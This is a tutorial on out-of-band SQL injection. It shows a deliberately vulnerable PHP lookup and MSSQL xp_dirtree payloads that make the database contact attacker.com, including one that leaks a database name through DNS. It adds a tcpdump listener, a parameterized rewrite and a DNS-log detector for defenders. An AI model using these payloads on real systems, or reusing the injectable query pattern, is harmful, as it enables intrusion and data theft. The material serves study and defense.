Out of Band SQL Injection
Normally in SQL Injection, the attacker:
Sees direct errors, or
Infers information through page behavior or timing.
But Out-of-Band SQL Injection is different:
OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.
This is useful when:
Errors are hidden,
No differences in page behavior,
No timing differences.
Example:
The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.
How Out-of-Band SQL Injection Works
Some databases have functions that allow making external network connections:
Database: Functions
MySQL: LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL)
Microsoft SQL Server: xp_dirtree(), xp_fileexist()
Oracle: UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS
An attacker can exploit these features to:
Force a DNS lookup
Trigger an HTTP request
Leak data through those requests.
Real-World Example Setup
Imagine a PHP page like:
<?php
// $conn is assumed to be an open mysqli connection established elsewhere.
// Deliberately vulnerable: the raw query-string value is concatenated
// straight into the SQL text. Errors are assumed to be suppressed, so a
// broken query produces no visible output.
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>
Problems:
User input is directly injected into SQL
No output-based or time-based feedback
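The hardened form of the same lookup, added here as an example (it is not code from the original page): the id is validated as an integer and the query runs as a mysqli prepared statement, so the SQL text is fixed and the value travels separately. `$conn` is assumed to be an open mysqli connection, as in the snippet above; the table and column names are taken from that snippet.

```php
<?php
// Added example: parameterized version of the product lookup.
// $conn is assumed to be an open mysqli connection established elsewhere.

// Treat id as an integer; anything that is not a whole number is rejected
// before it gets anywhere near the query.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Invalid product id');
}

// The statement text never changes; the value is bound as a parameter, so a
// payload such as  '; EXEC master..xp_dirtree '\\attacker.com\test' --
// is just an invalid id and never becomes part of the SQL.
$stmt = $conn->prepare('SELECT name, price FROM products WHERE id = ?');
if ($stmt === false) {
    http_response_code(500);
    exit('Lookup failed');
}
$stmt->bind_param('i', $id);
$stmt->execute();
$stmt->bind_result($name, $price);

if ($stmt->fetch()) {
    // Escape on output as well; the name comes from the database, not the user,
    // but keeping the output path clean costs nothing.
    echo 'Product Name: ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}
$stmt->close();
?>
```

With the value bound as a parameter, none of the out-of-band functions listed above can be reached through this input, because the injected text is never parsed as SQL in the first place.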
Example OOB SQL Injection Exploit
Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.
Injection payload:
'; EXEC master..xp_dirtree '\\attacker.com\test' --
Full URL:
http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--
What happens?
The database server tries to list the contents of the share \\attacker.com\test
A DNS lookup happens for attacker.com
The attacker sees the request and knows the SQL injection worked!
Another Example: Leaking Data
You can even exfiltrate data!
Example payload:
'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --
If the first database name is 'testdb', the database server will try to access:
testdb.attacker.com
If you monitor your domain’s DNS logs, you can see the database name!
Setting Up the Attacker's Server
You need to set up:
A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)
Or a web server to catch HTTP requests.
A simple way to catch DNS lookups with tcpdump:
sudo tcpdump -i eth0 port 53
Or use public services like:
Interactsh (by Project Discovery)
Burp Collaborator client
They give you a domain like random.oastify.com, and log incoming requests.
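On the defender's side, the counterpart to the attacker's DNS listener is the query log of the resolver the database host uses. The following is an added example, not code from the original page: it parses dnsmasq-style query-log lines (constructed here) and flags lookups that come from a database host (assumed address 10.0.0.5) for any domain outside an assumed allowlist, reporting the labels prepended to the domain, which is where a payload like the one above places the leaked value.

```php
<?php
// Added example (not part of the original page): a defender-side check over
// DNS query logs. The log lines are constructed in dnsmasq's query-log style;
// the database host address and the allowlisted domains are assumed values.

const DB_HOSTS = ['10.0.0.5'];
const ALLOWED_DOMAINS = ['corp.example', 'windows.com', 'microsoft.com'];

$sampleLog = <<<LOG
Apr 10 12:00:01 dnsmasq[812]: query[A] updates.corp.example from 10.0.0.5
Apr 10 12:00:03 dnsmasq[812]: query[A] attacker.com from 10.0.0.5
Apr 10 12:00:04 dnsmasq[812]: query[A] testdb.attacker.com from 10.0.0.5
Apr 10 12:00:05 dnsmasq[812]: query[A] testdb.attacker.com from 10.0.0.7
LOG;

/**
 * Returns one finding per DNS query that originates from a database host and
 * targets a domain outside the allowlist. 'leaked' holds the labels that were
 * prepended to the registrable domain, i.e. the data an OOB payload carries.
 */
function findOobDnsQueries(string $log): array
{
    $findings = [];
    foreach (explode("\n", $log) as $line) {
        // dnsmasq format: ... query[<type>] <name> from <client>
        if (!preg_match('/query\[(\w+)\] (\S+) from (\S+)/', $line, $m)) {
            continue;
        }
        [, $type, $name, $client] = $m;
        if (!in_array($client, DB_HOSTS, true)) {
            continue;   // only the database tier is of interest here
        }
        $labels = explode('.', rtrim(strtolower($name), '.'));
        // Naive registrable-domain split: the last two labels. A real
        // deployment should use the Public Suffix List instead.
        $domain = implode('.', array_slice($labels, -2));
        if (in_array($domain, ALLOWED_DOMAINS, true)) {
            continue;
        }
        $findings[] = [
            'client' => $client,
            'type'   => $type,
            'domain' => $domain,
            'leaked' => implode('.', array_slice($labels, 0, -2)),
        ];
    }
    return $findings;
}

// On the sample log this reports two queries from 10.0.0.5: attacker.com with
// nothing prepended (the "did it work?" probe) and testdb.attacker.com with
// the prepended label "testdb" (the leaked database name).
foreach (findOobDnsQueries($sampleLog) as $f) {
    printf("DB host %s queried %s (%s); prepended labels: '%s'\n",
        $f['client'], $f['domain'], $f['type'], $f['leaked']);
}
```

The same observation drives the mitigation: a database host that has no reason to resolve arbitrary external names should be denied outbound DNS and HTTP at the network boundary, which closes the channel regardless of which procedure the injection can reach. Where the server must resolve names, a short allowlist like the one above makes any lookup carrying a prepended label stand out.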